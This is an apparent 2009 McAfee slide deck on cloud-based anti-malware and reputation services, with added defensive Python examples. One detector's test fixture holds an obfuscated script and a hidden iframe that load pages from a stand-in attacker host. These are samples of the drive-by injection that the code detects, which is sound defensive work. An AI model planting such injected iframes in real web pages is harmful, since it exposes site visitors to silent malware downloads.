In the Cloud Security - FIRST
Page 1
July 28, 2009
In the Cloud Security
Greg Day, Principal Security Analyst EMEA, AVERT member
Page 2
Confidential McAfee Internal Use Only
The Tsunami
• Decades of threats, surely we have a handle on this?
• Estimated loss in excess of $1 trillion through cybercrime and data loss in 2008 (McAfee Unsecured Economies Report 2009)
• Q1 2009: 12 million new IPs zombied since January, a 50 percent increase over 2008 (McAfee Quarterly Threat Report Q1 2009)
• Koobface: more than 800 new variants in March 2009 (McAfee Quarterly Threat Report Q1 2009)
Page 3
Understand the motivation, to understand the methodology
Source: Chat interview with the Dream Coders Team, the developers of MPack, http://www.robertlemos.com/2007/07/23/mpack-interview-chat-sessions-posted/
Page 4
Today anyone can be a cyber criminal!
Page 5
Over 20 years of Anti-Virus
• Dr Solomon’s Anti-virus from 1990
• Looking for string match against known malware
Page 6
The age old question - Is anti-virus dying?
1991: Michelangelo – 6 months?
1997: WM/Cap – 2 months?
1999: WM/Melissa – 1 day?
2000: VBS/Loveletter – 4 hours?
2001: CodeRed/Nimda – 1 hour?
2003: Slammer – 3 mins?
2008: Mass web compromises – secs?
[Charts: Anti-Virus protection (%) of 2003 Medium+ threats and of 2004 Medium+ threats, one bar per AV product, each split into % proactive protection and % reactive protection]
Page 7
From Elephant to Chameleon: how threats have changed
Page 8
Evolution of threats
1987 – Brain & Stoned (early boot sector viruses, BSV)
1990 – Vienna modified to be polymorphic
1991 – Polymorphism hits the wild (Tequila)
1995 – WM/Concept (first macro virus)
1999 – Melissa mass mailer & ExploreZip reply mailer
2000 – Phage (virus for Palm Pilot)
2001 – CodeRed & Nimda (utilise security vulnerabilities)
2002 – Klez & Elkern, Bugbear (droppers)
2003 – Slammer (speed), Slapper (Unix, directed attack)
2004 – Turf wars (Bagle, Netsky, Sober, bots)
2005 – System & data theft (Trojans & rootkits)
2007 – Rootkits, packers, recycling (threat longevity)
2008 – Drive-by infections,
Page 9
Early proactive techniques
Page 10
Heuristics (behavioural analysis)
• Positive & negative analysis
• Protection against new file and/or macro viruses
• Checks for virus-like characteristics
• Block execution of possible virus code (OAS, the on-access scanner)
• No cleaning, as there is no exact match
• Tangible sample to send to the virus lab
Page 11
Speed…
The blended/zero-day attack brought the new solutions
Page 12
Page 13
Page 14
Proactive behavioural protection (HIPS, NIPS, FW, whitelisting etc…)
• Known vulnerability detection
• Behavioural controls
– RFC non-compliance
– Anomaly detection
– Policy controls
• Define web/email usage
• Lock down Windows & the Windows system folder
• Registry modification
• Block unused ports
– Proactive or reactive?
• Blacklist non-corporate high-risk apps
• Conficker – AutoRun.inf
Page 15
Proactive Behavioural Controls - limitations
• What did I really stop?
• Did it stop all of the attack?
• What else could it have done?
• We still want to identify the threat
• We sometimes need to clean up
• Assumes clean at point of install
Page 16
Volume…
• 246% growth from 2006 to 2007
• 400%+ growth projected for 2008
• 2008 exceeded projections
[Chart: number of threats per year (source: McAfee Avert Labs): 2006 – 78,381; 2007 – 271,197; 2008 – ~350,000 projected, 1,500,000+ actual]
Page 17
The Great Zoo: McAfee Known Malware Samples
Count of dirty samples/hashes in the McAfee zoo
Page 18
Shark – compilable multi-system backdoor Trojan. Now anyone can be a cyber criminal!
1. Set up server
2. Compile threat
3. Infected systems talk home!
4. See what you have!
5. Full control!
6. Enable keylogger
7. Control processes
Page 19
Buy the deployment tools
Page 20
Mass infection of public web pages globally (13 March 08)
• 200,000 web pages compromised
– SQL injection
– Vulns in .ASP pages running phpBB
• Inserted JS to write an IFRAME in the header or body; the IFRAME content targeted:
– MS06-014
– RealPlayer (ActiveX control)
– Baofeng Storm (ActiveX control)
– Ourgame GL World GlobalLink Chat (ActiveX control)
• Daisy-chains to a China server
– Drops downloaders
– Steals gaming credentials
Page 21
Example: IFrame & MPack
[Diagram: booby-trapped legitimate sites, the MPack C&C centre and the victim machine; (1) connection to a legitimate site, (2) silent redirect, (3) exploitation, (4) HTML infection / machine under control; the controlled machine is then used for botnets, RockPhish, fast-flux, DDoS, identity theft, …]
1. The victim visits a legitimate site that has been booby-trapped with hidden redirect code (hidden iFrame).
2. They are silently redirected to the server hosting the attack tool.
3. Depending on the browser, various vulnerabilities may be tested. Various malware are downloaded and executed.
4. The web pages accessible from the victim's workstation are in turn booby-trapped.
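Added example, not McAfee code and not from the deck: a Python scanner for the injection pattern the two preceding slides describe, a hidden IFRAME written into the header or body of a compromised page, or a script that writes one through document.write with escaped markup. It flags IFRAMEs that are zero- or one-pixel sized or styled invisible, and script blocks that write an IFRAME, noting unescape/fromCharCode/eval obfuscation when present. The HTML samples and the attacker.invalid hostname are constructed, and the rules for what counts as "hidden" are assumptions, not the detection logic of any product.

```python
import re
from html.parser import HTMLParser
from typing import Dict, List

# Assumed indicators of a hidden frame: invisible styling or off-screen positioning.
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|left\s*:\s*-\d{3,}|top\s*:\s*-\d{3,}", re.I)
# A script that writes an iframe, either as literal or escaped markup (%3C / \x3c = '<').
WRITES_IFRAME = re.compile(
    r"document\.write\s*\(.*?(<iframe|%3Ciframe|\\x3ciframe)", re.I | re.S)
OBFUSCATION = re.compile(r"unescape\s*\(|String\.fromCharCode|eval\s*\(", re.I)


def _tiny(value) -> bool:
    """True for width/height attributes of 0 or 1 (with or without 'px')."""
    try:
        return int(str(value).strip().rstrip("px")) <= 1
    except ValueError:
        return False


class IframeScanner(HTMLParser):
    """Collects suspicious <iframe> tags and <script> bodies while parsing."""

    def __init__(self):
        super().__init__()
        self.findings: List[Dict] = []
        self._in_script = False
        self._script_buf = ""

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            reasons = []
            if _tiny(a.get("width")) or _tiny(a.get("height")):
                reasons.append("zero-size")
            if HIDDEN_STYLE.search(a.get("style", "")):
                reasons.append("hidden-style")
            if reasons:
                self.findings.append({"kind": "iframe", "src": a.get("src"), "reasons": reasons})
        elif tag == "script":
            self._in_script, self._script_buf = True, ""

    def handle_data(self, data):
        if self._in_script:
            self._script_buf += data  # script bodies arrive as raw text

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            reasons = []
            if WRITES_IFRAME.search(self._script_buf):
                reasons.append("writes-iframe")
            if OBFUSCATION.search(self._script_buf):
                reasons.append("obfuscated")
            if reasons:
                self.findings.append({"kind": "script", "src": None, "reasons": reasons})


def scan_html(html: str) -> List[Dict]:
    """Returns one finding per suspicious iframe or script, in document order."""
    s = IframeScanner()
    s.feed(html)
    s.close()
    return s.findings


# Constructed samples: a page injected in the head (script) and body (iframe), and a clean page.
INFECTED = """<html><head><title>Shop</title>
<script>document.write(unescape('%3Ciframe src=%22http://attacker.invalid/in.cgi%22 width=0 height=0%3E%3C/iframe%3E'));</script>
</head><body><p>Welcome</p>
<iframe src="http://attacker.invalid/mpack/index.php" width="1" height="1" style="visibility:hidden"></iframe>
</body></html>"""
CLEAN = '<html><body><iframe src="https://video.example/embed" width="560" height="315"></iframe></body></html>'

if __name__ == "__main__":
    for f in scan_html(INFECTED):
        print(f)
    print("clean page findings:", scan_html(CLEAN))
```

Run it over a crawl of your own sites, not the victim's browser: the slide's point is that the injected frame is invisible to the visitor, so the only place to catch it is the served HTML. Pair the scan with a diff against the last known-good copy of each page, since legitimate 1x1 tracking frames exist and a size rule alone will produce false positives.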
Page 22
Regular “Protection Gap”
Protection gap of 24-72 hours with current solutions
[Timeline: t0 malware in the wild → t1 malware discovered → t2 protection is available → t3 protection is downloaded → t4 protection is deployed]
Page 23
Security in the Cloud
Page 24
Next Gen “In the cloud” detection
[Diagram: endpoint → Internet → fingerprint database]
Page 25
What is “in the Cloud scanning”?
• End-node reporting
• Very little system overhead
• Meta-data
Page 26
In the cloud security - Blocking what we already know!
• Non-replicating malware is static
• And some replicating malware is static too (e.g. worms)
• Can be detected with a fingerprint (MD5, SHA-1, SHA-2, etc.)
• Black list of fingerprints
[Chart: replicating vs non-replicating malware as a percentage of samples, 1999 to 2008]
Page 27
How does in the Cloud anti-virus work?
[Diagram: client ↔ Internet ↔ Artemis / Collective Threat Intelligence]
1. User receives new file via email or web
2. No detection with existing DATs, but the file is “suspicious”
3. Fingerprint of file is created and sent using Artemis
4. Artemis reviews this fingerprint and other inputs statistically across the threat landscape
5. Artemis identifies threat and notifies client
6. VirusScan processes information and removes threat
Page 28
In the Cloud in action
Page 29
In the cloud security - Identifying what we don’t know!
• Software may be deemed “suspicious” based on: observed behaviours; source; detections by other products
• Behaviours, sources and detections can each be assigned a weight
• Based on the resulting weight, software may be classified as “suspicious” with different degrees of certainty
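Added example, not McAfee code and not a description of Artemis internals, covering the three preceding slides (fingerprint blocklist, the six-step lookup, weighted classification): a Python model in which a file the local DAT string-match does not detect is fingerprinted with MD5/SHA-1/SHA-256, its SHA-256 is looked up in a fingerprint blocklist, and an unknown fingerprint is scored from weighted behaviours, source and other vendors' detections, then placed in a tier. The signatures, sample bytes, weights, thresholds and tier names are constructed assumptions.

```python
import hashlib
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed local DAT: the classic string match against known malware.
LOCAL_SIGNATURES: Dict[bytes, str] = {b"constructed-old-worm-pattern": "W32/OldWorm.constructed"}

# Constructed cloud blocklist: SHA-256 of known-bad content -> detection name.
KNOWN_BAD_SHA256: Dict[str, str] = {
    hashlib.sha256(b"MZ\x90\x00 constructed-known-bad-sample").hexdigest(): "Spy-Agent.bw (constructed stand-in)",
}

# Assumed weights; the slides say weights exist but give no values.
BEHAVIOUR_WEIGHTS = {
    "writes_autorun_inf": 40,
    "injects_into_process": 35,
    "disables_av_service": 50,
    "contacts_irc_c2": 45,
    "packed_with_unknown_packer": 15,
}
SOURCE_WEIGHTS = {"email_attachment": 20, "web_download": 15, "corporate_share": 0, "signed_vendor": -40}
OTHER_VENDOR_DETECTION_WEIGHT = 25  # per other product already flagging the sample
TIERS = [(100, "malicious"), (60, "very likely malicious"), (30, "suspicious")]  # assumed cut-offs


def local_scan(data: bytes) -> Optional[str]:
    """Step 2: the DAT check. Returns a name on an exact string match, else None."""
    for pattern, name in LOCAL_SIGNATURES.items():
        if pattern in data:
            return name
    return None


def fingerprint(data: bytes) -> Dict[str, str]:
    """Step 3: the hashes that leave the endpoint instead of the file itself."""
    return {alg: hashlib.new(alg, data).hexdigest() for alg in ("md5", "sha1", "sha256")}


@dataclass
class Evidence:
    """Step 4 inputs: what the file did, where it came from, who else flagged it."""
    behaviours: List[str] = field(default_factory=list)
    source: str = "web_download"
    other_detections: int = 0


def suspicion_weight(ev: Evidence) -> int:
    w = sum(BEHAVIOUR_WEIGHTS.get(b, 0) for b in ev.behaviours)
    w += SOURCE_WEIGHTS.get(ev.source, 0)
    w += OTHER_VENDOR_DETECTION_WEIGHT * ev.other_detections
    return w


def classify(weight: int) -> str:
    """Maps a total weight to a tier; anything below the lowest cut-off is 'unknown'."""
    for threshold, label in TIERS:
        if weight >= threshold:
            return label
    return "unknown"


def cloud_lookup(data: bytes, ev: Evidence) -> Dict:
    """Steps 1-5 end to end: DAT check, fingerprint, blocklist hit, or weighted scoring."""
    hit = local_scan(data)
    if hit:
        return {"stage": "local-dat", "verdict": "malicious", "name": hit, "weight": None}
    fp = fingerprint(data)
    name = KNOWN_BAD_SHA256.get(fp["sha256"])
    if name:
        return {"stage": "cloud-blocklist", "verdict": "malicious", "name": name,
                "weight": None, "sha256": fp["sha256"]}
    w = suspicion_weight(ev)
    return {"stage": "cloud-scoring", "verdict": classify(w), "name": None,
            "weight": w, "sha256": fp["sha256"]}


if __name__ == "__main__":
    print(cloud_lookup(b"MZ\x90\x00 constructed-known-bad-sample", Evidence()))
    print(cloud_lookup(b"MZ\x90\x00 never seen before",
                       Evidence(["writes_autorun_inf", "contacts_irc_c2"], "email_attachment", 1)))
    print(cloud_lookup(b"MZ\x90\x00 vendor tool", Evidence(["packed_with_unknown_packer"], "signed_vendor")))
```

Two things the model makes visible that the slides only imply: the blocklist hit needs no local signature update at all, only a hash comparison, which is why the protection gap collapses; and the scoring branch is only as good as its weights, so a negative weight for a trusted source (a signed vendor binary that happens to be packed) is what keeps a purely behavioural rule from generating false positives.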
Page 30
Closing the loop
Page 31
Malware case study – Spy-Agent.bw
First seen – 15th October 2008, 22:24:28
Auto-blacklisted – 15th October 2008, 22:57:01
Artemis clients sent fingerprints ~2 hours before regular submission saw the file
Page 32
Security & privacy
• Cryptographically strong actionable responses
• Query specific
• Immune to replay attacks
Example:
U0B6gKhbtiZCoxyh0IneADS/RShS8iRCBSEvwfjekG/q4yDRgqEUXjHWKvnrySGa6QMdftrlpl5pAdJvOUAcNcvCjKvpIfsxv8qBk4uRQQ60r5StRCXOpiA0Qy3fKmLRUZyNq1EyjLLPKgJDZI0nqHhRWX+TDgPgXRfW9wD06qE
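Added example, not McAfee code: the slide names the properties of the response (cryptographically strong, query specific, immune to replay) but not its format, and the opaque blob above is all the deck shows. This Python model gives each query a client nonce and has the responder MAC the tuple (fingerprint, nonce, verdict, timestamp); the client accepts a response only if the MAC verifies, it names this query's fingerprint and nonce, it is fresh, and it has not been accepted before. The shared HMAC key is an assumption standing in for whatever keying the real service uses; where the client cannot hold a shared secret, a signature under a service key is the usual choice and the checks are otherwise identical.

```python
import base64
import hashlib
import hmac
import json
import os
import time
from typing import Optional, Set

# Assumption: a shared HMAC key stands in for the service's real keying.
SHARED_KEY = b"constructed-shared-key-not-for-production"
MAX_AGE_SECONDS = 300  # assumed freshness window


def client_build_query(sha256_hex: str) -> dict:
    """Only the fingerprint leaves the endpoint, bound to a fresh random nonce."""
    return {"fp": sha256_hex, "nonce": base64.b64encode(os.urandom(16)).decode()}


def _mac(payload: dict) -> str:
    # Canonical JSON so client and server MAC exactly the same bytes.
    canonical = json.dumps(payload, sort_keys=True, separators=(",", ":")).encode()
    return base64.b64encode(hmac.new(SHARED_KEY, canonical, hashlib.sha256).digest()).decode()


def server_answer(query: dict, verdict: str, now: Optional[float] = None) -> dict:
    """The verdict is MACed together with the exact fingerprint and nonce it answers."""
    ts = int(time.time() if now is None else now)
    payload = {"fp": query["fp"], "nonce": query["nonce"], "verdict": verdict, "ts": ts}
    return {"payload": payload, "mac": _mac(payload)}


def client_verify(query: dict, response: dict, accepted_nonces: Set[str],
                  now: Optional[float] = None) -> Optional[str]:
    """Returns the verdict only for an authentic, fresh answer to *this* query; else None."""
    p = response["payload"]
    if not hmac.compare_digest(_mac(p), response["mac"]):
        return None  # forged, or modified in transit (e.g. verdict flipped to 'clean')
    if p["fp"] != query["fp"] or p["nonce"] != query["nonce"]:
        return None  # genuine answer, but to some other query: substitution or replay
    current = time.time() if now is None else now
    if abs(current - p["ts"]) > MAX_AGE_SECONDS:
        return None  # stale
    if p["nonce"] in accepted_nonces:
        return None  # the same answer delivered a second time
    accepted_nonces.add(p["nonce"])
    return p["verdict"]


if __name__ == "__main__":
    q = client_build_query("ab" * 32)
    r = server_answer(q, "malicious")
    seen: Set[str] = set()
    print("first delivery:", client_verify(q, r, seen))
    print("replayed:", client_verify(q, r, seen))
```

The nonce is what makes the response query specific: an attacker on the path who has captured a genuine "clean" answer for one fingerprint cannot serve it for another fingerprint, nor for the same fingerprint a second time, because the client never issues the same nonce twice. The timestamp bounds how long a captured answer stays usable against a client that has lost its nonce state.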
Page 33
Cloud security compressed “Protection Gap”
[Timeline: t0 malware in the wild → t1 malware discovered → t2 protection is available → t3 protection is downloaded → t4 protection is deployed. With cloud lookups, protection is delivered in real time at t1.]
Case study – Spy-Agent.bw
• Artemis protection – ~32 minutes
• Regular protection – ~8.5 hours
– Not including deployment time
Page 34
I was blind, but now I see
[Diagram: Collective Threat Intelligence fed by Vulnerability Research, Risk and Compliance, HIPS, Malware Research, Spam Research and SiteAdvisor, delivered over the Internet to Artemis customers]
Page 35
Taking it to the next level
Page 36
McAfee Global Threat Intelligence
Collaborative Global Intelligence
CyberWorld – IntelliCenter with intelligence probes in Atlanta, London, Hong Kong, San Jose, Chicago and Frankfurt
• Deploy security probes around the globe (firewalls, email gateways, web gateways)
• Global intelligence system: share cyber communication info (e.g. hackers, spammers, phishers)
• Results – Effective: accurate detection of bad IPs and domains; Proactive: deny connection to intruders to your enterprise
PhysicalWorld – intelligence agents (CIA, FBI, Interpol, police stations)
• Deploy agents: officers around the globe (MI5, MI6, FBI, CIA, Interpol)
• Global intelligence system: share intelligence information (e.g. criminal history, global fingerprinting system)
• Results – Effective: accurate detection of offenders; Proactive: stop them from coming into the country
Page 37
Global Intelligence, Local Protection
GLOBAL DATA MONITORING – IntelliCenter (Chicago, London, Portland, Atlanta, Hong Kong). Global data monitoring is fuelled by the network effect of real-time information sharing from thousands of gateway security devices around the world; 10 billion enterprise messages analyzed per month.
AUTOMATED ANALYSIS – dynamic computation of a reputation score (bad … good) per IP, domain, URL, image and message, from:
• Ownership: whois, zone files, trademark
• Content: images, text, links
• Behavior: social networks, persistence, longevity
REAL-TIME PROTECTION PLATFORMS:
• Edge / firewall: traffic shaping, attack blocking
• Web gateways: anti-malware, anti-spoofing
• Messaging gateways: outbreak detection, anti-spam
• Identity fraud applications: anti-phishing, zombie alerts
Page 38
Intelligence: How It All Works….
[Diagram: Internet → TrustedSource-enabled (TS-enabled) appliance ↔ McAfee Threat Intelligence]
1. Incoming traffic arrives; the TS-enabled appliance queries McAfee Threat Intelligence
2. McAfee Threat Intelligence returns reputation info
3. McAfee Threat Intelligence updates its records with new reputation info
This entire process happens constantly, every second, 7x24x365
Page 39
TrustedSource Data Mining Technologies
Responder Architecture
• Legacy protocol based on customized DNS servers
• Enhanced proprietary protocol (UDP over SSL)
[Diagram: query data ↔ reputation data ↔ analysis systems (instant analysis), fed by internal & external data sources]
Data sources:
• Historical data
• Message data/metadata
• Neighborhood data
• Ownership data
• Spamtraps and honeypots
• Blacklists
Page 40
What does it monitor?
• Email – IP reputation, message reputation
• Web – URL categories, web reputation
• Intrusion/FW – IP/protocol reputation, geo-location, IPS attack vector
Correlation across dimensions:
• Connection reputation: IP, domain
• Content reputation: URL, attachment, image, message
• Threat types: virus, phishing, spam, active content, malware, hack attack
• Sources monitored (email, web, other): zombies, botnets and other sources; compromised or malicious web sites or URLs; hacker sites; image spam, viruses, worms, Trojans; ActiveX, Java, VB code from infected web sites; DoS, DDoS and miscellaneous other attacks
Page 41
Message Reputation
[Diagram: a mail gateway receiving from a known spammer and from new/unknown spammers]
1. Known spammer sends message
2. Message is blocked
3. Unknown sender sends similar message
4. Message is recognized and blocked
5. Unknown sender sends different message
6. Message is associated with new machine in a botnet and blocked
Allows reputations to move across identities and protocols
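Added example, not McAfee code: a toy mail gateway in Python that reproduces the six-step sequence above. Messages are fingerprinted as word 3-shingles and compared with Jaccard similarity; a known-bad IP marks the content it sends as spam (IP reputation moves to the message), and a near-duplicate from a new IP marks that IP as bad (message reputation moves to the new sender), so a later, different message from the same IP is blocked as well. The IPs, messages and the 0.5 threshold are constructed; the similarity method is one common choice, not the deck's.

```python
import re
from typing import List, Set

SIMILARITY_THRESHOLD = 0.5  # assumed


def normalize(text: str) -> List[str]:
    """Lower-case, drop digits and punctuation (the parts spammers vary), split into words."""
    return re.sub(r"[^a-z\s]", " ", text.lower()).split()


def shingles(text: str, k: int = 3) -> Set[str]:
    """Set of overlapping k-word sequences; survives reordering of whole sentences."""
    words = normalize(text)
    if len(words) < k:
        return {" ".join(words)}
    return {" ".join(words[i:i + k]) for i in range(len(words) - k + 1)}


def jaccard(a: Set[str], b: Set[str]) -> float:
    return len(a & b) / len(a | b) if (a or b) else 0.0


class Gateway:
    def __init__(self, known_spammers: Set[str]):
        self.bad_ips: Set[str] = set(known_spammers)
        self.spam_fingerprints: List[Set[str]] = []
        self.log: List[str] = []

    def receive(self, src_ip: str, body: str) -> str:
        """Returns 'block' or 'deliver', updating both IP and message reputation."""
        fp = shingles(body)
        if src_ip in self.bad_ips:
            self.spam_fingerprints.append(fp)  # IP reputation -> content reputation
            return self._block(src_ip, "known bad IP")
        best = max((jaccard(fp, s) for s in self.spam_fingerprints), default=0.0)
        if best >= SIMILARITY_THRESHOLD:
            self.bad_ips.add(src_ip)  # content reputation -> new sender's IP
            self.spam_fingerprints.append(fp)
            return self._block(src_ip, f"matches known spam (similarity {best:.2f})")
        return "deliver"

    def _block(self, ip: str, reason: str) -> str:
        self.log.append(f"{ip} blocked: {reason}")
        return "block"


# Constructed scenario following the slide's six steps.
M1 = "Buy cheap meds online now! Visit our pharmacy store for discounts 50% off"
M2 = "BUY CHEAP MEDS online NOW!!! Visit our pharmacy shop for discounts 70% off"
M3 = "Your account statement is attached, please review"
M4 = "Minutes from the Tuesday project meeting are in the shared folder"


def run_scenario() -> List[str]:
    gw = Gateway(known_spammers={"198.51.100.7"})
    results = [
        gw.receive("198.51.100.7", M1),  # 1-2: known spammer, blocked
        gw.receive("203.0.113.9", M2),   # 3-4: unknown sender, similar message, blocked
        gw.receive("203.0.113.9", M3),   # 5-6: same sender, different message, IP now bad
        gw.receive("192.0.2.55", M4),    # unrelated sender and content, delivered
    ]
    return results + gw.log


if __name__ == "__main__":
    for line in run_scenario():
        print(line)
```

One caveat the toy makes obvious: step 6 also stores the botnet machine's benign-looking third message as a spam fingerprint, so an identical legitimate message from an innocent sender would now be blocked. Production systems therefore treat each link as a weight that raises or lowers a score rather than a flag that flips, and decay both IP and content reputation over time.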
Page 42
TS Web Reputation Breakout
Page 43
Building Web Reputation
[Diagram: raw data → analysis → reputation service (TrustedSource for Web), with size and precision increasing from left to right]
Raw data:
• TrustedSource for Email
• Domain registrations, WHOIS data, WebWasher classifiers, SmartFilter categories, web access logs, malware URLs, phishing URLs, spam URLs, Fortune 1000 websites
• Blacklists, whitelists
Analysis:
• Correlation mapping (joint conditional mapping)
• Support Vector Machine classification of all parameters
• Parked domain identifier, neighborhood classification
• Real-time classifier, geo-location, host information (DNS, WHOIS, OS, webserver, certificate information)
Reputation service:
• 75 million hosts
• More precise (-180 to +180)
• Identified zombies, malware, suspicious
Reputation range: -180 (bad) … suspicious … +180 (good)
Page 44
TrustedSource Web Database
• Category-based filtering + reputation based filtering = best protection available
• 96 URL categories
• TrustedSource global intelligence augments numerous categories such as Spam, Malicious Sites, Phishing, Hacking/Computer Crime
• Reputation-based filtering for today’s Web 2.0 threats
– Provides an additional layer of security
– Malicious sites, spyware, hacking, P2P, IM and more
• 31+ Million URLs (contains IPs, HTTP and HTTPS URLs)
• Automated proactive and reactive URL gathering systems
• Human review of URLs by multi-lingual/cultural Web Analysts
– Global coverage (language and regions)
• Real-time updates
Page 45
Artemis Q2 2009 QBR
TS Web Language breakout
Page 46
www.TrustedSource.Org
• Public portal
• View reputations for domains, IP addresses or URLs
• Sending patterns of the senders
• Analytical information:
– country of origin
– network ownership
– hosts for known senders within each domain
• Snapshot of global email trends, including a map illustrating country of origin for email attacks
• Graphs displaying overall email and spam volume trends
• ROI calculator
• ZombieMeter
• Domain Health Check
• Latest malware threats
• Blogs from experts
• Top spam senders
Page 47
Greg_Day@McAfee.com (the slide also spells the address out in binary)